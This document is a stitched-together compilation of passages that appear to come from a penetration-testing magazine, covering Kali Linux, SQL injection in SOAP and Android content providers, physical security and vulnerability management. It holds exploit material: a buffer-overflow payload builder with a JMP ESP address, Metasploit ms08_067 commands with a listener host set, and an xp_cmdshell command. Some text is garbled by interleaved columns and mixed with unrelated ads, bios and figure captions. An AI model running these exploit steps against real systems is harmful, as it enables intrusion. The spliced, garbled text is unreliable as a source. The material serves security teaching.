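    # Suppose OllyDbg shows EIP = 0x37684336 after sending pattern_create(2000)
    # (constructed value): which offset in the buffer is that?
    off = pattern_offset(0x37684336)
    print("EIP overwrite offset:", off)
    JMP_ESP = 0x7C86467B       # placeholder; take the real address from the search in Figure 55
    SHELLCODE = b"\xcc" * 32   # placeholder: int3 breakpoints, not a real payload
    buf = build_payload(off, JMP_ESP, SHELLCODE)
    print("payload length:", len(buf))
```

Send buf with the socket script above in place of MyBuffer. If the target module was compiled with rebasing or the address contains a bad byte for the input path (0x00, 0x0a, 0x0d are the usual ones for a text protocol), pick a different JMP ESP from the list in Figure 55.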
Figure 61. Output Folder

Benoît Delorme
Benoît was born in France, where he graduated at Exia with an emphasis on Networking and System Administration in Nancy. He now lives in Montreal, Quebec, where he is following courses to obtain a Master's degree from the University of Quebec in Montreal. His working fields are multi-factor security authentication like fingerprints and facial recognition, and at the same time he is giving courses on security for embedded devices in his spare time. He likes IT security in general, web development, particularly UX-wise, project management, his Nexus 4 phone, and preparing great meals. You can follow him on Google+: http://gplus.to/benoit.
The support for ARM hardware means that you can now get your hack on with devices such as EfikaMX, Beaglebone Black, CuBox, Samsung Galaxy Note, Samsung ARM Chromebook, SainSmart SS808, ODROID, and of course Raspberry Pi.

Kali Linux comes packed with over 300 security tools. This includes some of the oldies but goodies like Metasploit, Aircrack-ng, Kismet, John the Ripper, Nmap, Ettercap, Wireshark, OWASP Zed Attack Proxy and of course BeEF, but also many new tools like Ghost Phisher, Arachni Scanner, Unicornscan and Pass the Hash Toolkit. One of the things I noticed the most was the stability of Kali Linux when compared to BackTrack. I personally had many stability issues with BackTrack where it would either shut down on me, not start up, freeze, or worse, wouldn't detect my wireless card. This would drive me crazy and I found these issues on multiple different computers using different settings. I haven't had a single issue yet on Kali Linux and it always seems to be blazing fast. I definitely find it much more stable than its predecessor (Figure 1).

Figure 1. Kali Linux Applications menu
Figure 2. Logging into the Maltego Community Server

ettercap -G
Conclusion
Kali Linux has so much to offer when it comes to tools that save you time. I've given you some of my favorite tools that I've used many times when performing security audits, and I can't possibly recommend Kali Linux more to anyone interested in the security industry.

Paul Alkema
With more than 6 years of experience in the IT field, Paul is currently employed as the Sr. Web Application Developer for a large e-commerce website out of South Jersey. His current role includes static and dynamic security testing, documentation, and application development in C#, MVC, and other .NET languages. Paul has recently earned his GSSP in .NET and continues to grow his knowledge in security and penetration testing on a daily basis. In his free time, he works on miscellaneous open source projects in addition to keeping up with his blog at http://paulalkema.com.

Specializing in: iOS/OS X Forensics; Mobility & Security Architecture; Mobile Device Policy/BYOD; Secure File Storage & Transfer/Cloud; Open Source Integration. http://virtualnex.us/ 530-304-3216
In Depth Review of Kali Linux: A Hacker's Bliss
Kali Linux is a blessing for penetration testers worldwide. It addresses many of the shortcomings of its predecessor BackTrack and is immensely popular with professional hackers. Here we discuss the (relatively) new Kali Linux in depth and explore the qualities that make it different from BackTrack.

Kali Linux is a Linux distribution for penetration testing and security auditing. After its release in March 2013, Kali Linux has quickly become the new favorite among pentesters worldwide as their choice of pentesting OS. Replacing its predecessor BackTrack, Kali incorporated several new features and looks quite promising. It is available for the i386 and amd64 architectures, with ARM images as well, and has the same minimum hardware requirements as BackTrack: 1 GHz CPU, 8 GB of hard disk space, 300 MB RAM, and a DVD writer or the ability to boot from a USB drive.

A Little History
To be very concise, Kali is an offshoot of BackTrack, which is an offshoot of WHAX, which is itself an offshoot of Whoppix, which is derived from Knoppix. Something common among all of these distros is that they were focused on digital forensics and intrusion detection, with BackTrack and Kali adding a whole lot of tools for pentesting purposes. BackTrack has been giving machine guns to monkeys since 2007, so it has had a long reign as the favorite distro of pentesters worldwide. Offensive Security, the creators of BackTrack, decided to incorporate many changes in the new BackTrack 6 (as it was called at that time). Since it was built from scratch, it was significantly different from the older versions of BackTrack, and Offensive Security decided to give the distro a new name: Kali Linux.
EMBEDDED LINUX
Design, Development, and Manufacturing
www.css-design.com
Communication Systems Solutions 6030 S. 58th St. STE C Lincoln, NE 68516 402.261.8688
How to Detect SQL Injection Vulnerabilities in SOAP?

Tons of articles have been written about the SQL injection vulnerability. Since 2001, researchers all around the world have published techniques and tools to detect and exploit it. As the wise say: a fool with a tool is still a fool, and often the penetration tester acts like a fool, relying only on the automated scanning tools' output to detect SQL Injection: if no alert is thrown by the scanner, the application under review is marked as "safe". Things get worse if the application under review is not the classical Web Application: many "Security Professionals", at least here in Italy, think that SQL injection vulnerabilities affect only web applications. So if the vulnerable application, for example, is Windows MDI based and the back end integration is done through SOAP Web Services, SQL Injection vulnerabilities are not considered at all. Most of the time, SOAP Web Services are designed to integrate remote "trusted" systems, the security controls are poorly implemented or not implemented at all, and an attacker can easily bypass the application logic in order to access the database.

In this article, we will talk about a real world example, where the automated vulnerability scanner tools failed to detect the SQL injection vulnerability residing inside the SOAP web services code invoked by an MDI Windows application. In particular, we start by describing the vulnerability exploitation phases, from detection to database data acquisition using commonly available tools.

Application Behavior Analysis
To start this kind of security analysis, the first step is setting up the right environment. In this case, the penetration test goal was to simulate an attack coming from the internal network. To do that, we needed two different boxes: the first configured with the MDI application and the second with the tools we needed to perform the job. Usually during a penetration test, the traffic produced between the attacking machines and the target application is monitored and logged for assurance purposes, so in this case the first box was also equipped with Wireshark to accomplish the monitoring tasks. In this kind of test, monitoring the network traffic is also essential to understand how the application manages the underlying connection to the "data source". The testing scenario is represented in Figure 1.

After setting up the environment, we started running the application while collecting traffic on the MDI interface for a few minutes. As there was no encryption over the transport layer, we could easily discover that the application was relying on SOAP Web Services to expose data to the end-user. A snippet of the SOAP communication is reported in Figure 2.

Listing 2. The sqlmap command line used to exploit the vulnerability and retrieve the users
Figure 1 is based on the number of Android devices that have accessed Google Play within a 14-day period ending on the data collection date, i.e. 1 November 2012.
Food for thought: can someone use a phone to hack? Imagine the crowd; every day more than 1 million new Android devices are activated worldwide!
Introduction
Before we discuss how Android can be used as a penetration testing platform, let me quickly highlight the methodology we use for penetration testing, and then we will see how the Android platform easily fits into the methodological framework for pen testing. For example, if you are running a network penetration test, at a high level you need vulnerability scan-
The NIST SP800-115 technical document's four-phase penetration testing approach is shown in Figure 2. I will not explain these phases here; however, we will see how the Android platform fits into this. Penetration testing is highly dependent upon standardised tools. For each phase in this methodology you need tools to actually work for you. In one liner: you need to plan for your job of testing, discover your target and plan an attack. First plan your penetration testing project and get ready for action. First of all you need to know which tools you can use to actually start working with. Now the question is: would Android be able to provide support for actually executing the above methodology? The answer is hmm! Let's find out.
Nmap
Now it would be unfair if we haven't mentioned the great tool of all time for performing network sweeps
Conclusion
The tables are turning! Canonical has already announced that it will seamlessly integrate Android with the Linux-based Ubuntu distribution. A device running Ubuntu for Android loads Android during typical smartphone use cases, then switches to Ubuntu once it's been slid into a dock that connects to a monitor, keyboard, and mouse. The installation basically gives you two devices in one: an Android phone while on the go, and an Ubuntu desktop when plugged in.
Raheel Ahmad
Raheel Ahmad, CISSP, is an Information Security Consultant with around 10 years of experience in Information security and forensics.
Figure 7. Features of Anti
Android Vulnerability Analysis with Mercury Framework
During the past few years, smartphones and other mobile devices have seen their computational power and data connectivity rise to a level nearly equivalent to that available on desktop computers. Nowadays, users save more sensitive data on their smartphones than on their desktop PCs. Users are now able to log in to their email accounts, plan meetings, share thoughts and even do banking transactions with their smartphones. When talking about smartphones, we are looking at devices that run operating systems just like desktop PCs.
Android is an open source operating system based on a monolithic Linux based kernel with a layered structure of services including core native libraries and application frameworks. There are currently more than two million downloadable applications in the central repository of Android applications run by Google, and Android applications can also be downloaded from other third-party sites. On the application level, each software package is sandboxed by the kernel. In theory, even if an application gets exploited the attacker is not able to gain access to unprivileged data. Focusing on the Android application privileges, or as in the UNIX world called the permissions, is a very basic and important part of the Android security model. Android's permission model requires that each application explicitly requests the right to access protected resources before it may be installed. This will ensure that an application isn't able to access sensitive information stored on the system or in the private space of another application and that accessing hardware features such as the camera or GPS is not allowed.
Each application on the device runs under a separate User ID and Group ID, which means that every application is isolated from one another. There is also an option for the application to share different resources over the UID.
Despite these security controls, applications can be a serious security risk. This article will have a close look at Android applications, how to analyze them and what vulnerabilities could affect user data. For analyzing applications running on Android, a new tool has been developed by MWR InfoSecurity called The Mercury Framework, which offers security researchers a free framework to find vulnerabilities, write proof-of-concept and exploits, and allows dynamic analysis of Android applications.
To comprehend this tutorial it is necessary to have a basic knowledge of the Android security system and the functionality of well known security issues like SQL injections, directory traversal or insecure file permissions.
1 activities exported
0 broadcast receivers exported
0 content providers exported
0 services exported
debuggable = true
Practice
A tool for exploiting potential SQL injections in applications is the Software Webcontentresolver, also included in the Mercury Framework. In this test case, the Webcontentresolver didn't work correctly and a standalone version was used.
Figure 4. Mercury Framework's start screen
The researcher is now able to inspect an application from a web interface located under http://localhost:8080 (Figure 5). To get a list of the possible content providers, click on the list button. The output will be a list of content providers, their authority, whether they are exported, and the read/write permissions. In this example, the package com.android.providers.settings was chosen. The authority which has the permissions to read its settings. As seen in the table, the readPerm (standing for reading permission) is set to null. Knowing this means that any application is able to read everything within the package with the authority settings without having any permission (Figure 6). To get a list of the possible contents within the package, a tool called finduri can be used. The finduri tool is targeting com.android.providers.settings with the following command:

*mercury#provider> finduri com.android.providers.settings

The result gives an overview about the content:

/system/app/SettingsProvider.apk:
Contains no classes.dex
true
/system/app/SettingsProvider.odex:
content://customization_settings/SettingTable/
content://media/phoneStorage/audio/artists
content://media/phoneStorage/audio/media
content://customization_settings/SettingTable/

Query successful: Column count: 3 Row count: 1 | _id | name | value | 5 | volume_alarm | 6

http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5 will demonstrate the first vulnerability:

Exception: android.database.sqlite.SQLiteException: unrecognized token: ): , while compiling: SELECT * FROM system WHERE (_id=5) unrecognized token: ): , while compiling: SELECT * FROM system WHERE (_id=5)

To go further and actually exploit this SQL Injection vulnerability, either web application SQL Injection tools can be used or it can be done manually. (Manual exploitation will not be covered in this article.) The Mercury Framework includes a module to test SQL injections. The first step on Mercury is to query the content of the table and then try to inject the table. This can be done with the command:

*mercury#provider> query content://customization_settings/SettingTable/ --projection inject
no such column: inject: , while compiling: SELECT FROM SettingTable WHERE (key=)

As seen here, a typical SQL error will lead to SQL Injection. The aim of the attacker is to force the
scanner.provider.sqlinjection
The first module we will be looking at is scanner.provider.sqlinjection. To start it, we use the command run scanner.provider.sqlinjection. This scanner will now perform a fully automated search for SQL Injections and will give an output of the vulnerable queries as soon as it is finished. As seen here, two potential queries that can be attempted with injection were discovered (Figure 9).

[*] Summary
-------

scanner.provider.providerscan
The next tool is scanner.provider.providerscan. This tool checks automatically to see if there are queries in the provider section that it is able to read with the given permission set. Based on this data, an attacker is able to gain information that might contain sensitive information (Figure 10). The output tells us which content providers can currently be queried. For later analysis, the attacker just has to use the query command, such as the one discussed earlier in the SQL Injection section, and check for potential SQL Injections with the projection command.
Data collection and publishing are ubiquitous in today's world. Many organizations such as governmental agencies, hospitals, and financial companies collect and disseminate various person-specific data for research and business purposes. Worldwide, governments systematically collect personal information about their citizens through censuses. These data are released to the public for demographic research. In the medical domain, gaining access to high-quality healthcare data is a vital requirement for informed decision-making for medical practitioners and researchers. Grocery stores collect a large amount of customer purchase data via store courtesy cards. These data are analyzed to model customer behaviour and are used by advertisement companies. In the online world, web sites and service providers (Google for example) collect search requests of users for future analysis. Recent data publishing by AOL is a unique example of this kind [3]. Finally, the emergence of new technologies such as RFID tags, GPS-based devices, and smartphones raises new privacy concerns. These devices are used extensively in many network systems including mass transportation, car navigation, and healthcare management. The collected trajectory data captures the detailed movement information of the tagged objects, offering tremendous opportunities for mining useful knowledge. However, this trajectory data contains people's visited locations and thus reveals identifiable sensitive information such as social customs, religious inclination, and sexual preferences. Thus, data about individuals gets collected at various places in various ways.
This data offers tremendous opportunities for mining useful information, but also threatens personal privacy. Data mining is the process of extracting useful, interesting, and previously unknown information from large datasets. Due to the rapid advance in the storing, processing, and networking capabilities of computing devices, the collected data can now be easily analyzed to infer valuable information for research and business purposes. Data from different sources can be integrated and further analyzed to gain better insights. The success of data mining relies on the availability of high quality data and effective information sharing. Since data mining is often a key component of many systems of business information, national security, and monitoring and surveillance, the public has acquired a negative impression of data mining as a technique that intrudes on personal privacy. This lack of trust has become an obstacle to the sharing of personal information for the advancement of the technology.
Smartphone: a Win-Win Product for Both Consumers and Sellers
In a world where technology can be used for multiple exchanges, the use of mobile phones is no longer limited to simple voice communication functions. Mobiles are now providing access to a growing number of services due to Smartphone
A smartphone is a mobile phone built on a mobile operating system, with more advanced computing capability and connectivity than a feature phone. Nowadays, phones aren't just for basic needs like talking and texting; they have many advanced features such as the Internet, email, gaming, organizing, taking photos, playing music, shopping, watching movies and more. These features combined together constitute a smartphone. The building block of any smartphone is its operating system (OS). The smartphone market is among the largest and fastest growing markets in the world of consumer electronics. An operating system manages the hardware and software resources of smartphones. It is currently dominated by the Android and iPhone smartphones, with BlackBerry and Symbian phones at a distant 3rd and 4th position.
Nowadays, smartphones are a basic part of life for every corporate employee. They use smartphone devices to gain access to the company's credentials and to check company specific mails and data. Thus, security remains a big concern at the workplace. So penetration testing needs to be done on every available aspect whenever it is possible.
Smartphones Today
Smartphone growth and adoption is increasing rapidly worldwide due to their rich and versatile functionality. The versatility and convenience of these devices makes them a priority over other similar devices like PDAs (Personal Digital Assistants) or Tablets. Today, a smartphone is not just used to talk; rather it is utilized for a wide array of services, viz. GPS, MP3 player, a range of entertainment, electronic banking, reading e-books or attending office meetings online. Such a diverse mixture of services can only be delivered with the combination of strong compact hardware and high-speed reliable software with a good Operating System.
Smartphone Operating System
Google's Android platform is expected to have the largest share of the global smartphone operating system market by 2014. Companies making Android devices include Samsung, HTC, and Motorola Mobility, which Google owns. Samsung also makes phones running Bada, which is based on Linux. Nokia has traditionally relied on Symbian, but it is banking its future on Windows. Android and iOS have combined for 87.6% of the 2012 smartphone market. As per the shipment numbers, Android had 68% market share of worldwide smartphones in Q2 2012, with iOS a distant second at 16.9%. Despite being down year-on-year, BlackBerry and Symbian
Smartphone Vendor
Samsung is the undisputed leader in the worldwide smartphone market. By the end of 1Q13, Samsung shipped more units than the combined shipment of the next four vendors. Apple has held the second spot in the smartphone market. Apple's mix of models shipped to market is increasingly diversified as it tries to reach new buyers. LG smartphone volume for the quarter was driven in large part by its 3G smartphone portfolio, namely the L series and the Nexus 4. LTE-enabled devices, including the Optimus G series, also contributed to its success. LG is anticipated to continue its upward trajectory with the launch of the F and L series targeting the mid-range and entry-level segments. Huawei has shown significant improvement; it has decreased its dependence on rebranded feature phones while growing its Ascend portfolio to address multiple customer segments with more branded smartphone offerings. In 2013, ZTE's focus is to grow in North America and Europe. In China, where increasing price pressure has challenged vendors to grow profitably, ZTE will emphasize its higher-price products. In addition, ZTE will be among the first com-
Figure 1. Global, top smartphone Operating System market share (per cent), Quarter 2, 2012 (Source: IDC Worldwide Mobile Phone Tracker, August 8, 2012)
Figure 2. Global, top five smartphone vendors, unit shipments (million), Quarter 1, 2013 (Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013)
Figure 3. Global, top five smartphone vendors, market share (per cent), Quarter 1, 2012 (Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013)
Figure 4. Global, top five smartphone vendors, market share (per cent), Quarter 1, 2013 (Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013)
SPF Console;
SPF Web based GUI;
SPF Android App;
SPF Android Agent.
Information Technology security training is relevant and should be required by anyone who works in your organization that touches a computer. End users are employees of the organization who utilize computers and electronic devices to create, modify, or access data on your network. It is safe to say that pretty much everyone in your organization is considered an end user, including management, engineers, administrative personnel, even security personnel. While some users are less concerning than others (i.e. your security staff should all be up to speed on IT security), it is vital that everyone knows security best practices and understands their role in organizational security. In this article, we will examine what can be done to ensure that end users are getting the right level of security training to ensure that there is buy-in to IT security.
The End User Problem
According to the McAfee Threats Report: Fourth Quarter 2012 (McAfee Labs, 2013): The growth of malware shows a very steady curve in the past year. We already have more than 113 million samples in our malware zoo, and should approach 120 million next quarter. Growth in new malware by quarter is also on a relatively steady, and steeper, path. (Figure 1)
It should come as no surprise that with the amount of threats in circulation (consider, for example, the aforementioned number of malware samples in the McAfee Labs database) security issues occur often. A rough estimate is that over 50% of security breaches are caused by end users, either because of IT security ignorance or by accident. These mistakes are embarrassing, but more importantly, they are costly to the organization.
Organizations often invest large sums of money into a skilled security team, and technologies such as antivirus software, firewalls, Intrusion Detection/Prevention Systems, etc., but the greatest information security risk, the end user, is often overlooked. Regardless of the size, complexity, or industry of an organization, if it utilizes computers or networks in any capacity, IT security training for end users is a necessity.
The Security Awareness Program
A security awareness program should be utilized to inform end users of security risks and issues. The chances of you turning all end users into security drones may seem slim, but the better the knowledge shared with them, and the increase in their understanding of security concepts, will help to extend the security blanket of your organization.
References
Call center comics (2004). Retrieved from: http://www.callcentercomics.com/Cartoons/Information-Security.htm
Center for Information Security Awareness (n.d.). Retrieved from: http://www.cfisa.org/index.php/solutions/training-principles.html
Getting executive buy-in, CIAS (n.d.). Retrieved from: http://cias.utsa.edu/docs/TakeHome/Cyber%20Security%20Solutions%20Materials/Management%20Buy-in/Getting%20Executive%20Buy-in.pdf
Information Warfare Site (n.d.). Retrieved from: http://www.iwar.org.uk/comsec/resources/sa-tools/
Manjack, M. (2006). Social engineering your employees to information security. Retrieved from: http://www.sans.org/reading_room/whitepapers/awareness/social-engineering-employees-information-security_1686
McAfee Labs (2013). McAfee threats report: Fourth quarter 2012. Retrieved from: http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q4-2012.pdf
Mitnick, K. D., & Simon, W. L. (2002). The art of deception: Controlling the human element of security. Indianapolis, IN: Wiley Publishing, Inc.
Native Intelligence, Inc. (n.d.). Retrieved from: http://www.nativeintelligence.com/ni-free/awareness-slogans.asp
PJ (2010). Free Keep Calm Themed Information Security Awareness Posters: Mindful Security. Retrieved from: http://mindfulsecurity.com/2010/10/10/free-keep-calm-themed-information-security-awareness-posters/
SecTechno (n.d.). Retrieved from: http://www.sectechno.com/2011/12/09/new-cyber-security-awareness-campaign/?utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+Sectechno+%28SecTechno%29
Security-Faqs.com (n.d.). Retrieved from: http://www.security-faqs.com
StaySafeOnline.org (n.d.). Retrieved from: http://www.staysafeonline.org/for-business/resources-smallmed-sized-businesses
The Hacker News (n.d.). Retrieved from: http://thehackernews.com/search/label/Security%20News
Sun Tzu, the Chinese general, strategist, and philosopher, stated "all war is deception". While much emphasis is placed on technological security solutions such as firewalls within the IT sector, often the area of physical security is sorely neglected. Within corporate culture, the demarcation lines are frequently blurred and when an incident takes place there is the usual finger pointing, allocation of blame and knee-jerk reactions. The old adage "a little prevention is worth a lot of cure" springs to mind here, yet sadly this important concept is frequently ignored across departments, especially in large organisations. On a daily basis, the lack of a security-focussed mindset leaves businesses and public bodies vulnerable to attack, and the relatively small number of incidents reinforces the illusion "it could not happen here". Complacency is the first enemy in this war, and until an organisation suffers the humiliation of a successful attack which has been discovered, it is often difficult to express the urgency of good practice. More troubling are the incidents where the perpetrator has got clean away, and the only clue is where the subsequent chaos results in corporate head scratching and the unanswered question "how could this confidential data possibly get out?" To start with, an attacker needs a willing and cooperative victim. A lot of the responsibility for the loss of data can be placed at the feet of the organisation itself, as social engineering (which is the close relative of those engaging in breaching physical defences), corporate culture, and bad physical design play a major part in this type of breach. So how can an organisation harden itself against this vector?
Your Employees
Probably the biggest risk overlooked are those who are already inside the building, complete with corporate security pass. Are they loyal or do they have ulterior motives? Then there is the human factor to take into account: people genuinely want to believe the best of others, and once inside the four walls of Acme Corp, subconsciously everybody is part of the same team. After all, Joe Bloggs has a security pass and Human Resources/Security/Management would not have issued this unless Joe was trustworthy. As the culture swings towards more and more external contractors and roles become more specialised, the maintenance man with his head inside the switch rack or underneath the floor tiles runs little chance of being exposed as a fraud. Worse still are those that join the organisation with a Trojan Horse mentality; once inside the door there are rich pickings to be had. Finally, there are the revengeful, those with grudg-
So called security locks on key safes are easy to pick (trust me on this) and most mass produced desk locks, filing cabinet locks, etc. are a joke. High security locks are a must, especially as the IT industry has a reputation for providing poor quality locks that provide a reassuring sense of false security on servers, etc. Case locks on PCs and servers can be compromised by an angle grinder, bolt cutters, or in the hands of the initiated, a reasonably effective lock pick. At the end of the day, provided the level of brute force does not cause excessive damage to the underlying device, a determined attacker will be able to gain access to anything. The solution here is to use time to our advantage, having layers upon layers of security to delay the attacker sufficiently and increase the chances of discovery so their chance of losing morale and giving up is increased. The physical dimension often poses more challenges than the technological.
Businesses are stuck with their buildings, and the cost benefit analysis of a secure site will often fail as the amount of investment required to bring the security up to scratch will just not be available. This is where it is critical that the concept of security by design is introduced right at the beginning of the initial plan of where an office, datacentre, or communications node, etc. is located. The best prophylactic in these circumstances is the eyes and ears of your employees, as once the architecture is designed and the outer walls are breached your first line of defence has already crumbled. This includes shoulder surfing, open plan offices, poorly located data centres, etc. Once the bricks and mortar have dried, it is a war of attrition securing poorly designed infrastructure.
of attack can and will be exploited. However, securing these areas may be outside the realm of the principal we wish to protect. The principal may use a well known cleaning company who has a lack of security; this domino effect is well demonstrated in the Hollywood movie Wall Street.
Serious analysis and interpretation needs to be made of the current risks, not excluding the attacker who may not intend to damage IT infrastructure, but manages to by fluke. Controversial businesses need to have an ear towards intelligence, and take appropriate steps if they are unpopular or are experiencing a negative PR spike. While attack is not the best form of defence in these circumstances, awareness of the risks is paramount. The political, ethical and financial temperature needs to be monitored, and this metric fed back into the security equation.
To summarise, physical security is everyone's business. While the penetration tester can demonstrate weakness, ultimately a determined or opportunistic attacker can and will gain access provided their resources, either physical or psychological, exceed those of the victim. This means the culture of corporate complacency towards risk needs to be examined, and a deeper co-operation established rather than security being an afterthought. From individual employees, finance to HR, architects to service providers, each brings their own vulnerabilities. Unless a holistic approach is taken, closing doors after the horse has bolted will be the order of the day. After all, an open window on the ground floor allowing a thief to steal papers from a desk is just as much a vulnerability as an unsecured server or confidential papers left on the photocopier.
Political, Financial, Environmental, and Ethical Considerations
How seriously should your business take physical security? One would hope that a doctor's office would be less vulnerable than a military installation, but the obvious target would be access to drugs, confidential patient records, and identity theft. Few would question a man in a white coat wearing a stethoscope with a branded ID in a hospital, but is that uniform genuine? The professional attacker will use every trick in the book to establish a trust relationship with the victim. Uniforms, IDs, etc. provide just enough credibility that the attacker is bona fide. On the other hand, the recent mass release of data pertaining to women who had abortions carried out in the UK demonstrates that targets most people would consider unworthy
About the Author
Rob Somerville has been passionate about technology since his early teens. A keen advocate of open systems since the mid-eighties, he has worked in many corporate sectors including finance, automotive, airlines, government and media in a variety of roles from technical support, system administrator, developer, systems integrator and IT manager. He has moved on from CP/M and nixie tubes but keeps a soldering iron handy just in case.
Vulnerability Assessment and Management is the core component of any security program. In the modern world of software technologies, where every 1000 lines of software code have 40% vulnerabilities, nothing is reliable; everything connected is just like a ticking bomb and natively vulnerable.
Our approach to handling the latest security challenges and zero day attacks should be as proactive as the hackers exploiting them before we know about them. We have to think ahead of hackers, we have to think like hackers think; our approach to handling vulnerabilities should be based on how hackers look into vulnerabilities. Vulnerability Assessment and Management has its complete lifecycle, illustrated in Figure 1. Defense in-depth and 360 degree security fails due to flaws in software, IOS and update patches, and our security assessment modeling. Organizations might have state of the art security controls but cannot completely control the human element, which is the main cause of failure: humans are the weakest link and could be easily trapped with the help of the latest techniques and other social media attacks; the lack of awareness of the possibilities of social engineering attacks calls for a security awareness campaign to be started immediately. It should be the core part of the Information Security Program. The complexity of detecting, analyzing, and countering emerging intrusive security threats, especially those that are distributed in nature with multiple attack sessions (where each individual attack session is genuine but the combined attack sessions may not be genuine), imposes the need for a new security approach that unifies centralized analysis with the capability to collectively collate, analyze, and interpret threats coming from distributed multiple attack sessions and provides practical countermeasures. The integrated approach requires our understanding and attitude to handle corporate vulnerabilities in a centralized manner, not like traditional IT silos. This problem has been rectified by the market leaders of VAM solutions, but not 100%. Thanks to centralizing all of these silos under one umbrella named Vulnerability Assessment and Management, VAM software suites are doing a good job by providing a unified platform, allowing generation of multiple dashboards with relevant user groups, each having their own group of equipment and privileges to scan and manipulate their findings. This unified nature provides the capability to consolidate all vulnerabilities and to associate Risk Management with them.
VAM suites still need to integrate with other areas where vulnerabilities are causing more damage, such as Software Source Code Analysis. A software code analysis suite scans and provides detailed security vulnerability information in application code; the integration with VAM suites will allow the CISO to be aware of security issues in in-house developed software applications before they move into the production environment. Further, VAM needs to be
Let's assume you have installed Kali Linux and have access to a virtual lab or have express permission from your company's IT manager to test your internal network. What's next?
T
he first step in attacking a network is un- malicious RPC request. A simple way of verifying
derstanding what you are up against. This unpatched servers is to use the nmap scripting li-
phase involves mapping the discovering brary (Listing 1).
and mapping the network. Tools such as nmap Examining the nmap output shows that serv-
or unicornscan will help identify services that are er 10.0.0.5 is not vulnerable, However the serv-
available within the network. Nmap service scan er 10.0.0.6 might be vulnerable. Next, we use a
(-sV option) is very useful in identifying services Metasploit module to exploit the vulnerability
and when combined with the script scan (-sC), can
save valuable time when attacking a network. [root@kali]# msfconsole
You have done a network reconnaissance
using Nmap and other vulnerability scanners. Metasploit is invoked using the command msconsole.
Whats Next?
=[ metasploit v4.7.0-2013092501 [core:4.7
Exploitation api:1.0]
This article walks you through a few easy wins + -- --=[ 1195 exploits 726 auxiliary 200 post
which allow you to get your foothold (or full + -- --=[ 312 payloads 30 encoders 8 nops
pwange!) depending on how the internal environ- msf >
ment is configured. msf > use exploit/windows/smb/ms08_067_netapi
Nmap scan report for 10.0.0.6 msf exploit(ms08_067_netapi) > set LHOST
PORT STATE SERVICE 10.0.0.200
445/tcp open microsoft-ds LHOST => 10.0.0.200
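Once the -sV output is in hand, the same report that tells the tester where to look tells the system owner what to patch or firewall first. The following Python is an added example, not code from the article: it parses nmap's normal output (a constructed sample that reuses the article's 10.0.0.5 and 10.0.0.6 addresses, not a real scan) and lists, per host, the open services whose patch level and exposure should be confirmed first. WATCH_SERVICES is an assumed triage list; extend it to match your own environment.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of "nmap -sV" normal output (not real scan
# data); the addresses mirror the ones used in the article.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 5.9p1
445/tcp  open  microsoft-ds Microsoft Windows 7 microsoft-ds

Nmap scan report for 10.0.0.6
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and current:
            port, proto, state, service, version = m.groups()
            hosts[current].append((int(port), proto, state, service, version or ""))
    return dict(hosts)

# Services a defender wants to verify first; an assumed triage list for this
# example, not a list from the article or from nmap.
WATCH_SERVICES = {
    "microsoft-ds": "SMB: confirm OS patch level and restrict 445/tcp to the subnets that need it",
    "msrpc": "RPC endpoint mapper: confirm it is firewalled from untrusted segments",
    "ms-wbt-server": "RDP: enforce network-level authentication and limit exposure",
}

def triage(hosts):
    """Map each host to the sorted (port, service, action) items it should be reviewed for."""
    findings = {}
    for host, ports in hosts.items():
        items = [(port, svc, WATCH_SERVICES[svc])
                 for port, _proto, state, svc, _ver in ports
                 if state == "open" and svc in WATCH_SERVICES]
        if items:
            findings[host] = sorted(items)
    return findings

if __name__ == "__main__":
    for host, items in triage(parse_nmap(SAMPLE_NMAP_OUTPUT)).items():
        for port, svc, action in items:
            print("%s %5d/tcp %-14s %s" % (host, port, svc, action))
```

The parser keys on the "Nmap scan report for" header, so it works unchanged on a multi-host scan; the triage step is deliberately separate so the same parsed data can feed a patch-verification ticket rather than an exploit queue.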
Default Passwords

Quite often, new servers or applications get deployed on systems as part of a project roll-out. System administrators are not always aware of the packages that an application requires or installs. Many applications which provide a web-based GUI use application servers such as Tomcat to process and present the information. These applications may not be hardened by the vendor and may be configured with default

Figure 1. Result of authenticating the server

    Meterpreter>
    [*] SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c echo OWNED > C:\owned.exe'
    output
    ------
    [*] Auxiliary module execution completed
Database Servers

Every organization needs database servers. The most commonly seen servers are Oracle, MySQL, and MS-SQL. Oracle database servers commonly run on port 1521/TCP. Oracle database servers 9 and lower do not have a listener password set by default and allow enumerating the service identifiers (SIDs). In order to connect to the database server you need to specify the SID. In Oracle 10g and onwards this is not the case. When trying SID enumeration against a 10g+ server we see the following response
The most common web application security weakness is the failure to properly validate input coming from the client or environment before using it. This weakness leads to almost all the major vulnerabilities in web applications, like cross-site scripting, SQL injection, interpreter injection, locale/Unicode attacks, file system attacks, and buffer overflows. Data from an external entity or client should never be trusted, since it can be arbitrarily tampered with by an attacker. Accept known good and reject known bad; this technique must be followed. That is rule number one. Unfortunately, complex applications often have a large number of entry points, which makes it difficult for a developer to enforce this rule. I will describe the latest tools and techniques that will evaluate the security issues in web applications.

There are lots of open source and paid web application auditing frameworks. The top 5 tools that I personally use for pentesting will be discussed here.

First, one of my favorite tools for auditing web applications is Burp Suite from PortSwigger. Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp Suite contains many key features:

- An intercepting proxy, which lets you inspect and modify traffic between your browser and the target application.
- An application-aware spider, for crawling content and functionality.
- An advanced web application scanner, for automating the detection of numerous types of vulnerability.
